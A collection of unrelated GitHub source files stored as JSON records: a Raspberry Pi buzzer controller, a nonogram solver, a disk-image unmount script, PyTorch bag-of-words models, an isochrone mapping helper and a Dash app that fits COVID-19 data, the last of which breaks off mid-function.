+{"seq_id":"5189991162","text":"# Based on: http://bit.ly/226GBjt (Limor \"Ladyada\" Fried for Adafruit Industries, (c) 2015)\n\n\nimport RPi.GPIO as GPIO\nimport time\n\nimport adc\n\n# Используем нумерацию выводов по типу GPIO.BOARD,\n# подробнее: http://bit.ly/1pC3VEs\nGPIO.setmode(GPIO.BOARD)\n\n# Номера портов, которые будут использованы для SPI. Сюда будет подключен АЦП\n# SPI port on the ADC to the Cobbler\nSPICLK = 12\nSPIMISO = 16\nSPIMOSI = 18\nSPICS = 22\n\n# Пин, на который подключена пищалка\nBUZZER_PIN = 40\n\n# Устанавливаем пин пищалки на вывод\nGPIO.setup(BUZZER_PIN, GPIO.OUT)\n\n# Максимальная частота в герцах.\n# Именно на этой частоте будет звучать пищалка, когда мы потенциометр выкрутим на максимум\nMAX_FREQ = 400 # Hz\n\n# Про ШИМ в RPi.GPIO: https://sourceforge.net/p/raspberry-gpio-python/wiki/PWM/\n\n# Создаем экземпляр класса ШИМ.\n# Через этот объект мы будем выводить сигнал на пин BUZZER_PIN с некоторой частотой\nbuzzer_pwm = GPIO.PWM(BUZZER_PIN, MAX_FREQ)\n\n# Устанавливаем режимы пинов интерфейса SPI\n# set up the SPI interface pins\nGPIO.setup(SPIMOSI, GPIO.OUT)\nGPIO.setup(SPIMISO, GPIO.IN)\nGPIO.setup(SPICLK, GPIO.OUT)\nGPIO.setup(SPICS, GPIO.OUT)\n\n# 10k trim pot connected to adc #0\n# Потенциометр подключен на нулевой вход АЦП\npotentiometer_adc = 0\n\nlast_read = 0 # Переменная отслеживает последнее считанное с потенциометра значение\ntolerance = 7 # Минимальное изменение значения. Новое значение с потенциометра будем\n # считывать только тогда, когда разница между текущим и предудущим значением\n # будет больше tolerance. Необходимо для устранения дребезжания\n\n# Начинаем пищать. 50.0 - процент времени, на протяжении которого будем держать на пине 1-цу\nbuzzer_pwm.start(50.0)\n\n# Основной бесконечный цикл\nwhile True:\n # Будем считать, что потенциометр не изменил положение\n # we'll assume that the pot didn't move\n trim_pot_changed = False\n\n # Считываем очередное значение с АЦП\n # read the analog pin\n trim_pot = adc.readadc(potentiometer_adc, SPICLK, SPIMOSI, SPIMISO, SPICS)\n\n # Вычисляем разницу между текущим и прошлым значением\n # how much has it changed since the last read?\n pot_adjust = abs(trim_pot - last_read)\n\n # Если изменение больше tolerance\n if pot_adjust > tolerance:\n # Считаем, что потенциометр изменил положение\n trim_pot_changed = True\n\n # Если потенциометр повернулся...\n if ( trim_pot_changed ):\n set_frequency = trim_pot / 10.24 # преобразовываем 10-битное значение adc0 (0-1024) в значение\n # процента частоты (от 0 до 100)\n set_frequency = round(set_frequency, 2) # Округляем полученное значение до сотых\n #set_frequency = int(set_frequency) # cast volume as integer\n\n print('Frequency = {freq}%' .format(freq = set_frequency)) # выводим новое значение частоты на экран\n\n buzzer_pwm.ChangeFrequency( # Изменяем частоту пищания на...\n max(\n MAX_FREQ * set_frequency / 100.0, # ...произведение максимальной частоты на процент\n 1 # ...либо на 1Гц, если потенциометр будет установлен в ноль\n )\n )\n\n # Сохраняем последнее считанное значение до следующей итерации\n # save the potentiometer reading for the next loop\n last_read = trim_pot\n\n # Ничего не делаем 1/10-ю секунды\n # hang out and do nothing for a 1/10th of second\n time.sleep(0.1)\n","repo_name":"crtv-club/dotcat_demo_rpi","sub_path":"2016.03.11/adc_potentiometer.py","file_name":"adc_potentiometer.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72451771112","text":"#PASSED but not efficient enough for 15x15 puzzles\r\n\r\n# Once you complete this kata, there is a 15x15 Version that you can try. And once you complete that, you can do the Multisize Version which goes up to 50x50.\r\n#\r\n# Description\r\n# For this kata, you will be making a Nonogram solver. :)\r\n#\r\n# If you don't know what Nonograms are, you can look at some instructions and also try out some Nonograms here.\r\n#\r\n# For this kata, you will only have to solve 5x5 Nonograms. :)\r\n#\r\n# Instructions\r\n# You need to complete the Nonogram class and the solve method:\r\n#\r\n# class Nonogram:\r\n#\r\n# def __init__(self, clues):\r\n# pass\r\n#\r\n# def solve(self):\r\n# pass\r\n# You will be given the clues and you should return the solved puzzle. All the puzzles will be solveable so you will not need to worry about that.\r\n#\r\n# The clues will be a tuple of the horizontal clues, then the vertical clues, which will contain the individual clues. For example, for the Nonogram:\r\n#\r\n# | | | 1 | | |\r\n# | 1 | | 1 | | |\r\n# | 1 | 4 | 1 | 3 | 1 |\r\n# -------------------------\r\n# 1 | | | | | |\r\n# -------------------------\r\n# 2 | | | | | |\r\n# -------------------------\r\n# 3 | | | | | |\r\n# -------------------------\r\n# 2 1 | | | | | |\r\n# -------------------------\r\n# 4 | | | | | |\r\n# -------------------------\r\n# The clues are on the top and the left of the puzzle, so in this case:\r\n#\r\n# The horizontal clues are: ((1, 1), (4,), (1, 1, 1), (3,), (1,)),\r\n# and the vertical clues are: ((1,), (2,), (3,), (2, 1), (4,)).\r\n# The horizontal clues are given from left to right. If there is more than one clue for the same column,\r\n# the upper clue is given first. The vertical clues are given from top to bottom. If there is more than one clue for\r\n# the same row, the leftmost clue is given first.\r\n#\r\n# Therefore, the clue given to the __init__ method would be\r\n# (((1, 1), (4,), (1, 1, 1), (3,), (1,)), ((1,), (2,), (3,), (2, 1), (4,)))\r\n# You are given the horizontal clues first then the vertical clues second.\r\n#\r\n# You should return a tuple of the rows as your answer. In this case, the solved Nonogram looks like:\r\n#\r\n# | | | 1 | | |\r\n# | 1 | | 1 | | |\r\n# | 1 | 4 | 1 | 3 | 1 |\r\n# -------------------------\r\n# 1 | | | # | | |\r\n# -------------------------\r\n# 2 | # | # | | | |\r\n# -------------------------\r\n# 3 | | # | # | # | |\r\n# -------------------------\r\n# 2 1 | # | # | | # | |\r\n# -------------------------\r\n# 4 | | # | # | # | # |\r\n# -------------------------\r\n# In the tuple, you should use 0 for a unfilled square and 1 for a filled square. Therefore, in this case, you should return:\r\n#\r\n# ((0, 0, 1, 0, 0),\r\n# (1, 1, 0, 0, 0),\r\n# (0, 1, 1, 1, 0),\r\n# (1, 1, 0, 1, 0),\r\n# (0, 1, 1, 1, 1))\r\n# Good Luck!!\r\n#\r\n# If there is anything that is unclear or confusing, just let me know :)\r\n\r\nclass Nonogram:\r\n\r\n def __init__(self, clues):\r\n #__init__ allows the class to accept a parameter\r\n self._clues = clues\r\n pass\r\n\r\n\r\n def get_col(self, c, solution):\r\n #Gets a vertical column at index c from our 2d matrix, solution.\r\n row = [x[c] for x in solution]\r\n return row\r\n\r\n\r\n def test_row(self, row, clue):\r\n #Determine if the proposed row solution matches the clue\r\n result = [] #Will become the clue that actually matches this row\r\n seq_cnt = 0 #counts the length of a sequence of 1s\r\n for val in row:\r\n if val == 1:\r\n seq_cnt += 1\r\n else:\r\n # Add seq length to result\r\n if seq_cnt > 0:\r\n result += [seq_cnt]\r\n seq_cnt = 0\r\n #Add seq length to result\r\n if seq_cnt > 0:\r\n result += [seq_cnt]\r\n return (list(clue) == result)\r\n\r\n\r\n def generate_sols(self, row, clue):\r\n #Generates all valid combos for this row.\r\n #First generate all possible combos for this row (ignoring the clue):\r\n row_sols = [[]]\r\n for val in row:\r\n if val == -1:\r\n #We need to double the number of solutions:\r\n for i in range(len(row_sols)):\r\n #add a new row with a 1 appended:\r\n row_sols += [row_sols[i] + [1]]\r\n #append a 0 to the original:\r\n row_sols[i] += [0]\r\n else:\r\n for i in range(len(row_sols)):\r\n # Just append the known value to all solutions:\r\n row_sols[i] += [val]\r\n\r\n #Check row_sols against our clue:\r\n valid_sols = []\r\n for sol in row_sols:\r\n if self.test_row(sol, clue):\r\n valid_sols += [sol]\r\n return valid_sols\r\n\r\n\r\n def solve(self):\r\n #Determine width and height of puzzle:\r\n W = len(self._clues[0])\r\n H = len(self._clues[1])\r\n #Initialize our solution, with -1 meaning unknown:\r\n solution = [[-1]*W for x in range(H)]\r\n\r\n #Repeat the entire loop until every cell has been solved:\r\n while any(-1 in x for x in solution):\r\n ###Go through each column, from left to right:\r\n for c,clue in enumerate(self._clues[0]):\r\n row = self.get_col(c, solution)\r\n #generate each possible solution to this row:\r\n row_sols = self.generate_sols(row, clue)\r\n #Check if any cells can be locked in:\r\n for i in range(len(row)):\r\n #Dont waste time unless this cell in unknown:\r\n if row[i] == -1:\r\n #See all posible values for cell i:\r\n cell_options = [sol[i] for sol in row_sols]\r\n #If there is only one unique value for this cell...\r\n if len(set(cell_options)) == 1:\r\n #change the value in solution:\r\n solution[i][c] = cell_options[0]\r\n\r\n ###Go through each row, from top to bottom:\r\n for r,clue in enumerate(self._clues[1]):\r\n row = solution[r]\r\n # generate each possible solution to this row:\r\n row_sols = self.generate_sols(row, clue)\r\n # Check if any cells can be locked in:\r\n for i in range(len(row)):\r\n # Dont waste time unless this cell in unknown:\r\n if row[i] == -1:\r\n # See all posible values for cell i:\r\n cell_options = [sol[i] for sol in row_sols]\r\n # If there is only one unique value for this cell...\r\n if len(set(cell_options)) == 1:\r\n # change the value in solution:\r\n solution[r][i] = cell_options[0]\r\n\r\n # Package the solution into a tuple of tuples:\r\n return tuple(tuple(row) for row in solution)\r\n\r\n\r\n# test.it('Test 1')\r\nclues = (((1, 1), (4,), (1, 1, 1), (3,), (1,)),\r\n ((1,), (2,), (3,), (2, 1), (4,)))\r\n\r\nans = ((0, 0, 1, 0, 0),\r\n (1, 1, 0, 0, 0),\r\n (0, 1, 1, 1, 0),\r\n (1, 1, 0, 1, 0),\r\n (0, 1, 1, 1, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n\r\n# test.it('Test 2')\r\nclues = (((1,), (3,), (1,), (3, 1), (3, 1)),\r\n ((3,), (2,), (2, 2), (1,), (1, 2)))\r\n\r\nans = ((0, 0, 1, 1, 1),\r\n (0, 0, 0, 1, 1),\r\n (1, 1, 0, 1, 1),\r\n (0, 1, 0, 0, 0),\r\n (0, 1, 0, 1, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n\r\n# test.it('Test 3')\r\nclues = (((3,), (2,), (1, 1), (2,), (4,)),\r\n ((2,), (3, 1), (1, 2), (3,), (1,)))\r\n\r\nans = ((1, 1, 0, 0, 0),\r\n (1, 1, 1, 0, 1),\r\n (1, 0, 0, 1, 1),\r\n (0, 0, 1, 1, 1),\r\n (0, 0, 0, 0, 1))\r\n\r\nprint(Nonogram(clues).solve() == ans)\r\n","repo_name":"EricPWilliamson/Codewars-algorithms","sub_path":"Solutions/nonogram5x5_cw.py","file_name":"nonogram5x5_cw.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34697359553","text":"import sys\nimport os\nimport subprocess\nimport time\nimport warnings\n\nLOOP_DIR = '/mnt/loop'\n\ndef subprocess_cmd(command):\n '''\n execute command and print out result\n '''\n process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n proc_stdout = process.communicate()[0].strip()\n return proc_stdout.decode(\"utf-8\")\n\ndef umount_image():\n '''\n cleanup mounted image (umount and disconnect)\n '''\n if os.path.exists('{}/home/cisco'.format(LOOP_DIR)):\n cmd = \"sudo chown 1000:1000 {0}/home/cisco/*;\\\n sudo umount {0}/;\\\n sudo qemu-nbd --disconnect /dev/nbd0;\\n\".format(LOOP_DIR)\n subprocess_cmd(cmd)\n\nif __name__ == '__main__':\n umount_image()\n","repo_name":"ZhiyuanYaoJ/Aquarius","sub_path":"src/test/test_umount_image.py","file_name":"test_umount_image.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33381731848","text":"import numpy as np\r\nimport torch as th\r\nfrom torch import nn\r\nimport torch.nn.functional as F\r\n\r\nINFINITY = 100\r\n\r\n\r\nclass BoWClassifier(nn.Module):\r\n\r\n def __init__(\r\n self,\r\n n_layers,\r\n embed_dim,\r\n hidden_dim,\r\n n_classes,\r\n dic,\r\n dropout=0.0,\r\n ):\r\n super().__init__()\r\n # Hyper parameters\r\n self.n_layers = n_layers\r\n self.embed_dim = embed_dim\r\n self.hidden_dim = hidden_dim\r\n self.dic = dic\r\n # Word embeddings\r\n self.embed = nn.Embedding(\r\n len(dic),\r\n embed_dim,\r\n padding_idx=dic.pad_idx\r\n )\r\n # classifier layer\r\n dims = [embed_dim] + [hidden_dim] * (n_layers - 1) + [n_classes]\r\n layers = []\r\n for layer, (di, dh) in enumerate(zip(dims, dims[1:])):\r\n # Dropout\r\n layers.append(nn.Dropout(dropout))\r\n # Affine transform\r\n layers.append(nn.Linear(di, dh))\r\n # Non linearity\r\n if layer < n_layers - 1:\r\n layers.append(nn.ReLU())\r\n # Classifier\r\n self.output = nn.Sequential(*layers)\r\n\r\n def encode(self, x, lengths=None):\r\n \"\"\"Encode sentence into embed_dim sized vectors\"\"\"\r\n L, bsz = x.size()\r\n # Embed words\r\n x_embeds = self.embed(x)\r\n # Mask padding tokens\r\n padding_mask = x.eq(self.dic.pad_idx).unsqueeze(-1)\r\n out = x_embeds.masked_fill(padding_mask, 0)\r\n # Mean pool\r\n out = out.mean(dim=0)\r\n # Rescale for shorter sentences\r\n out = out * L / (L-padding_mask.float().sum(dim=0))\r\n return out\r\n\r\n def logits(self, x, lengths=None):\r\n \"\"\"Logits\"\"\"\r\n h = self.encode(x, lengths=lengths)\r\n return self.output(h)\r\n\r\n def nll(self, x, y, lengths=None, ls=0.0):\r\n \"\"\"Negative log-likelihood\"\"\"\r\n # Get log priobabilities\r\n logits = self.logits(x, lengths=lengths)\r\n log_p = F.log_softmax(logits, dim=-1)\r\n # Log likelihood\r\n ll = th.gather(log_p, 1, y.unsqueeze(-1)).squeeze(-1)\r\n # Interpolate with the uniform distribution\r\n if ls > 0.0:\r\n ll = (1 - ls) * ll + ls * log_p.mean(dim=1)\r\n return -ll\r\n\r\n\r\nclass BoNgramLM(nn.Module):\r\n \"\"\"[summary]\r\n\r\n Args:\r\n n_layers ([type]): [description]\r\n embed_dim ([type]): [description]\r\n hidden_dim ([type]): [description]\r\n context_size ([type]): [description]\r\n vocab_size ([type]): [description]\r\n dropout (float, optional): [description]. Defaults to 0.0.\r\n\r\n Returns:\r\n [type]: [description]\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n n_layers,\r\n embed_dim,\r\n hidden_dim,\r\n context_size,\r\n vocab_size,\r\n dropout=0.0,\r\n ):\r\n super().__init__()\r\n # Hyper parameters\r\n self.n_layers = n_layers\r\n self.embed_dim = embed_dim\r\n self.hidden_dim = hidden_dim\r\n self.context_size = context_size\r\n self.vocab_size = vocab_size\r\n self.hidden_size = vocab_size\r\n # Word embeddings\r\n self.embed = nn.Embedding(vocab_size, embed_dim)\r\n # Initial embeddings (for the -1, ... -context_size tokens)\r\n if self.context_size > 1:\r\n self.context_vectors = nn.Embedding(self.context_size-1, embed_dim)\r\n # classifier layer\r\n input_dim = embed_dim*context_size\r\n dims = [input_dim] + [embed_dim] * n_layers\r\n layers = []\r\n for layer, (di, dh) in enumerate(zip(dims, dims[1:])):\r\n # Dropout\r\n layers.append(nn.Dropout(dropout))\r\n # Affine transform\r\n layers.append(nn.Linear(di, dh))\r\n # Non linearity\r\n if layer < n_layers - 1:\r\n layers.append(nn.ReLU())\r\n self.layers = nn.Sequential(*layers)\r\n # Classifier\r\n self.output = nn.Linear(embed_dim, vocab_size)\r\n\r\n def init_weights(self):\r\n nn.init.normal_(self.embed.weight, 0, 1/np.sqrt(self.embed_dim))\r\n for layer in self.layers:\r\n nn.init.normal_(layer.weight, 0, 1/np.sqrt(layer.in_features))\r\n nn.init.zero_(layer.bias)\r\n nn.init.normal_(self.output.weight, 0, 1/np.sqrt(self.embed_dim))\r\n nn.init.zero_(self.output.bias)\r\n\r\n def forward(self, input_ids, *args):\r\n bsz, L = input_ids.size()\r\n # Embed words\r\n embeds = self.embed(input_ids)\r\n # Pad to size\r\n if self.context_size > 1:\r\n pad_ids = th.arange(self.context_size-1).view(1, -1).repeat(bsz, 1)\r\n pad_vectors = self.context_vectors(pad_ids.to(embeds.device))\r\n embeds = th.cat([pad_vectors, embeds], dim=1)\r\n # Concat\r\n embeds = th.cat(\r\n [embeds[:, i:i+L]\r\n for i in range(self.context_size)],\r\n dim=-1\r\n )\r\n # Feed into the FF\r\n h = self.layers(embeds.view(-1, self.context_size*self.embed_dim))\r\n # Logits\r\n logits = self.output(h).view(bsz, L, -1)\r\n return logits\r\n\r\n\r\nclass BOWGenerative(nn.Module):\r\n \"\"\"BoW generative model\r\n\r\n Args:\r\n n_layers ([type]): [description]\r\n embed_dim ([type]): [description]\r\n hidden_dim ([type]): [description]\r\n vocab_size ([type]): [description]\r\n n_classes ([type]): [description]\r\n dropout (float, optional): [description]. Defaults to 0.0.\r\n tie_embeddings (bool, optional): [description]. Defaults to True.\r\n generative (bool, optional): [description]. Defaults to False.\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n vocab_size,\r\n n_classes,\r\n generative=False,\r\n ):\r\n super(BOWGenerative, self).__init__()\r\n # Hyper parameters\r\n self.vocab_size = vocab_size\r\n self.n_classes = n_classes\r\n self.hidden_size = vocab_size\r\n self.generative = generative\r\n # label logits\r\n self.label_logit = nn.Embedding(1, n_classes)\r\n # word logits\r\n self.word_logit = nn.Embedding(n_classes, vocab_size)\r\n\r\n def forward(\r\n self,\r\n labels,\r\n x,\r\n attention_mask=None,\r\n token_type_ids=None,\r\n return_embeds=False,\r\n ):\r\n \"\"\"Encode sentence into 2 x dh sized vectors\"\"\"\r\n # Shape\r\n bsz, L = x.size()\r\n # Select logit for each word at each position depending on the label\r\n word_logits = self.word_logit(labels.view(-1, 1).repeat(1, L-1))\r\n word_logits = word_logits.view(bsz, (L-1), -1)\r\n # Get label logits\r\n if self.generative:\r\n label_logits = self.label_logit(th.zeros_like(labels))\r\n label_logits = label_logits.view(bsz, -1).contiguous()\r\n logits = (word_logits, label_logits)\r\n else:\r\n logits = (word_logits,)\r\n # Return logits\r\n return logits\r\n","repo_name":"pmichel31415/P-DRO","sub_path":"src/models/bow.py","file_name":"bow.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"14440602480","text":"import math\nimport numpy as np\nimport networkx as nx\nimport osmnx as ox\nfrom shapely.geometry import Point, MultiPolygon, MultiLineString\nfrom shapely.ops import unary_union, polygonize\nfrom scipy.spatial import Delaunay\n\n\ndef alpha_shape(points, alpha):\n \"\"\"\n @param alpha alpha value to influence the gooeyness of the border.\n When Biggest then lose points\n \"\"\"\n\n if len(points) < 4:\n return MultiPolygon((list(points))).convex_hull\n\n def add_edge(edges, edge_points, coords, i, j):\n if (i, j) in edges or (j, i) in edges:\n return\n edges.add((i, j))\n edge_points.append(coords[[i, j]])\n\n coords = np.array([point.coords[0] for point in points])\n\n tri = Delaunay(coords)\n edges = set()\n edge_points = []\n\n for ia, ib, ic in tri.vertices:\n pa = coords[ia]\n pb = coords[ib]\n pc = coords[ic]\n\n a = math.sqrt((pa[0] - pb[0]) ** 2 + (pa[1] - pb[1]) ** 2)\n b = math.sqrt((pb[0] - pc[0]) ** 2 + (pb[1] - pc[1]) ** 2)\n c = math.sqrt((pc[0] - pa[0]) ** 2 + (pc[1] - pa[1]) ** 2)\n\n s = (a + b + c) / 2.0\n\n area = math.sqrt(s * (s - a) * (s - b) * (s - c))\n circum_r = a * b * c / (4.0 * area)\n\n if circum_r < 1.0 / alpha:\n add_edge(edges, edge_points, coords, ia, ib)\n add_edge(edges, edge_points, coords, ia, ib)\n add_edge(edges, edge_points, coords, ia, ib)\n\n m = MultiLineString(edge_points)\n triangles = list(polygonize(m))\n\n return unary_union(triangles)\n\ndef create_graph(network_type, coord, time_traveling):\n speed = 4.5\n if network_type == 'drive_service':\n speed = 50\n\n G = ox.graph_from_point(coord,\n dist_type='network',\n network_type=network_type,\n dist=speed*float(time_traveling)/60*1000)\n\n point_of_interest = ox.distance.nearest_nodes(G, coord[1], coord[0])\n G = ox.project_graph(G)\n\n if network_type == 'drive_service':\n G = ox.speed.add_edge_speeds(G, fallback=25)\n\n for _, _, _, data in G.edges(data=True, keys=True):\n data['speed_kph'] = data['speed_kph'] / 1.8\n G = ox.speed.add_edge_travel_times(G)\n\n elif network_type == 'walk':\n meters_per_minute = 75\n for _, _, _, data in G.edges(data=True, keys=True):\n data['travel_time'] = data['length'] / meters_per_minute\n\n subgraph = nx.ego_graph(G,\n point_of_interest,\n radius=float(time_traveling) * speed,\n distance='travel_time')\n node_points = [\n Point((data[\"x\"], data[\"y\"])) for node, data in\n ox.project_graph(subgraph, to_crs='epsg:4326').nodes(data=True)\n ]\n\n return node_points\n","repo_name":"TaranovEV/householder_gis","sub_path":"simplegis/getiso.py","file_name":"getiso.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11627462435","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nimport pandas as pd\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\nimport plotly.graph_objs as go\nfrom lmfit import Parameters\n\nfrom get_data import get_corona_data\nfrom logistic_model import logistic_function, LogisticModel\n\nCOLORS = ['rgb(31, 119, 180)', 'rgb(255, 127, 14)',\n 'rgb(44, 160, 44)', 'rgb(214, 39, 40)',\n 'rgb(148, 103, 189)', 'rgb(140, 86, 75)',\n 'rgb(227, 119, 194)', 'rgb(127, 127, 127)',\n 'rgb(188, 189, 34)', 'rgb(23, 190, 207)']\n\nexternal_stylesheets = [dbc.themes.BOOTSTRAP, 'https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\nserver = app.server\n\napp.layout = dbc.Container(\n children=[\n dcc.Store(id='corona-data', ),\n dcc.Store(id='population-data'),\n html.Div(\n [\n dbc.Row(\n [\n dbc.Col(html.Button('Daten neu laden.', id='reload-button'), width='auto'),\n dbc.Col(dcc.Dropdown(\n options=[{'label': country, 'value': country} for country in ('Germany', 'France')],\n id='country-dropdown',\n value='Germany',\n )),\n dbc.Col(html.Button('Daten fitten', id='fit-button'), width='auto')\n ]\n ),\n dcc.Graph(id='figure'),\n dbc.Row(\n [\n dbc.Col(dbc.ButtonGroup(\n [\n dbc.Button(\"Linear\"),\n dbc.Button(\"Logarithmisch\")\n ]\n ), width='auto'),\n html.Label(id='range-label'),\n dbc.Col(dcc.RangeSlider(\n min=0,\n max=200,\n value=[0, 200],\n id='range-slider'\n ))\n ]\n ),\n ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n \"padding\": \"12px 25px 25px 25px\"}\n ),\n html.Div(\n [\n html.H3(\"Verbreitung des Virus\"),\n html.P(r\"Die Infectionsrate ergibt sich aus der durchschnittlichen Anzahl an Kontakten \"\n r\" und der Wahrscheinlichkeit einer Ansteckung p. Ist die Infektionsrate\"\n r\" größer als die Genesungsrate, verbreitet sich das Virus exponentiell.\"),\n html.Label(id='infection-label'),\n dcc.Slider(\n id='infection-slider',\n min=0,\n max=1,\n step=0.01,\n marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n value=0.1,\n disabled=True\n ),\n dbc.Row(\n [\n dbc.Col(\n dbc.FormGroup(\n [\n dbc.Label(id='infection_probability-label'),\n dcc.Slider(\n id='infection_probability-slider',\n min=0,\n max=1,\n step=0.01,\n marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n value=0.1,\n )\n ]\n )\n ),\n dbc.Col(\n dbc.FormGroup(\n [\n html.Label(id='number_contact-label'),\n dcc.Slider(\n id='number_contact-slider',\n min=0,\n max=20,\n step=0.1,\n marks={np.round(i, 1): str(np.round(i, 1)) for i in np.arange(0, 20, 1.)},\n value=2,\n ),\n ]\n )\n )\n ]\n ),\n html.Label('Anfänglich Infizierte:'),\n dcc.Input(\n id='initial-input',\n type='number',\n value=10\n )\n ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n \"padding\": \"12px 25px 25px 25px\"}\n ),\n html.Div(\n [\n html.H3(\"Rückgang des Virus\"),\n html.P(\"Sowohl Genesene als auch Gestorbene können das Virus nicht weiter verbreiten. Für die \"\n \"Ansteckung neuer infizierter ist also eine effektive Rückgangsrate relevant, die sich aus der \"\n \"Genesungsrate und Mortalität ergibt.\"),\n dbc.Label(id='reduction-label'),\n dcc.Slider(\n id='reduction-slider',\n min=0,\n max=1,\n step=0.001,\n marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n disabled=True\n ),\n dbc.Row(\n [\n dbc.Col(\n dbc.FormGroup(\n [\n dbc.Label(id='recovery-label'),\n dcc.Slider(\n id='recovery-slider',\n min=0,\n max=1,\n step=0.01,\n marks={np.round(i, 2): str(np.round(i, 2)) for i in np.arange(0, 1, 0.1)},\n value=0.5,\n )\n ]\n )\n ),\n dbc.Col(\n dbc.FormGroup(\n [\n dbc.Label(id='mortality-label'),\n dcc.Slider(\n id='mortality-slider',\n min=0,\n max=10,\n step=0.1,\n marks={i: str(i) + \"%\" for i in range(11)},\n # marks={np.round(i, 1): str(np.round(i, 1)) for i in np.arange(0., 11., 1.)},\n value=1,\n )\n ]\n )\n )\n ]\n )\n ], style={\"border\": \"1px black solid\", \"border-radius\": \"5px\", \"border-color\": \"grey\",\n \"padding\": \"12px 25px 25px 25px\"}\n ),\n ])\n\n\n@app.callback(\n Output('corona-data', 'data'),\n [Input('reload-button', 'n_clicks')],\n [State('corona-data', 'data')]\n)\ndef load_data(clicks, corona_data):\n if clicks is None:\n raise PreventUpdate\n data_country = get_corona_data().reset_index()\n return data_country.to_json()\n\n\n@app.callback(\n Output('population-data', 'data'),\n [Input('reload-button', 'n_clicks')],\n [State('population-data', 'data')]\n)\ndef load_population_data(clicks, data):\n if clicks is None:\n raise PreventUpdate\n population_url = 'https://raw.githubusercontent.com/datasets/population/master/data/population.csv'\n population = pd.read_csv(population_url)\n population = population.set_index(['Country Name', 'Year']).Value\n return population.unstack().iloc[:, -1].to_json()\n\n\n@app.callback(\n [Output('country-dropdown', 'options'),\n Output('range-slider', 'value')],\n [Input('corona-data', 'modified_timestamp')],\n [State('corona-data', 'data')]\n)\ndef update_country_dropdown(ts, data):\n if ts is None:\n raise PreventUpdate\n data = pd.read_json(data)\n countries = data['Country/Region'].unique()\n\n data = data.set_index('Country/Region', inplace=False).loc['Germany']\n data = data.set_index('Date')\n dates = data.index.dayofyear - data.index.dayofyear[0]\n return [{'label': country, 'value': country} for country in countries], (dates.min(), dates.max())\n\n\n@app.callback(\n Output('range-label', 'children'),\n [Input('range-slider', 'value')]\n)\ndef update_label(values):\n return 'Fit Bereich: Tag {} bis Tag {}'.format(values[0], values[1])\n\n\n@app.callback(\n [Output('infection_probability-slider', 'value'),\n Output('recovery-slider', 'value'),\n Output('initial-input', 'value')],\n [Input('fit-button', 'n_clicks'),\n Input('range-slider', 'value')],\n [State('country-dropdown', 'value'),\n State('number_contact-slider', 'value'),\n State('mortality-slider', 'value'),\n State('corona-data', 'data'),\n State('population-data', 'data')]\n)\ndef fit_data(clicks, fit_range, country,\n number_contact, mortality,\n corona_data, population_data):\n if clicks is None:\n raise PreventUpdate\n data = pd.read_json(corona_data)\n data_country = data.set_index('Country/Region').loc[country]\n data_country = data_country.set_index('Date')\n dates = data_country.index.dayofyear - data_country.index.dayofyear[0]\n data_country.index = dates\n data_country = data_country.iloc[(data_country.index >= fit_range[0]) * (data_country.index <= fit_range[1])]\n population = pd.read_json(population_data, typ='series').loc[country]\n\n model = LogisticModel\n logistic_params = Parameters()\n logistic_params.add('infection_rate', value=0.01, min=0)\n logistic_params.add('recover_rate', value=0.01, max=1)\n logistic_params.add('infected_0', value=1e-3, min=0, max=1)\n logistic_params.add('mortality', value=mortality/100, min=0, max=1, vary=False)\n fit = model.fit(data_country['Active Cases']/population, params=logistic_params, time=data_country.index,\n method='powell')\n infected_0 = fit.eval(params=fit.params, time=[-fit_range[0]])[0]\n print(infected_0, fit.best_values['infected_0'])\n return (fit.best_values['infection_rate']/number_contact,\n fit.best_values['recover_rate']/(1 + mortality/100),\n infected_0 * population)\n\n\n@app.callback(\n Output('infection-label', 'children'),\n [Input('infection-slider', 'value')]\n)\ndef update_infection(value):\n return 'Infectionsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('infection-slider', 'value'),\n [Input('infection_probability-slider', 'value'),\n Input('number_contact-slider', 'value')]\n)\ndef update_infection(probability, number):\n return probability * number\n\n\n@app.callback(\n Output('number_contact-label', 'children'),\n [Input('number_contact-slider', 'value')]\n)\ndef update_infection(value):\n return 'Durchschnittliche anzahl Kontakte pro Tag: {}'.format(round(value, 1))\n\n\n@app.callback(\n Output('infection_probability-label', 'children'),\n [Input('infection_probability-slider', 'value')]\n)\ndef update_infection(value):\n return 'Wahrscheinlichkeit einer Ansteckung pro Kontakt: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('reduction-slider', 'value'),\n [Input('recovery-slider', 'value'),\n Input('mortality-slider', 'value')]\n)\ndef calculate_reduction(recovery, mortality):\n return recovery * (1 + mortality/100)\n\n\n@app.callback(\n Output('reduction-label', 'children'),\n [Input('reduction-slider', 'value')]\n)\ndef update_infection(value):\n return 'Reductionsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('recovery-label', 'children'),\n [Input('recovery-slider', 'value')]\n)\ndef 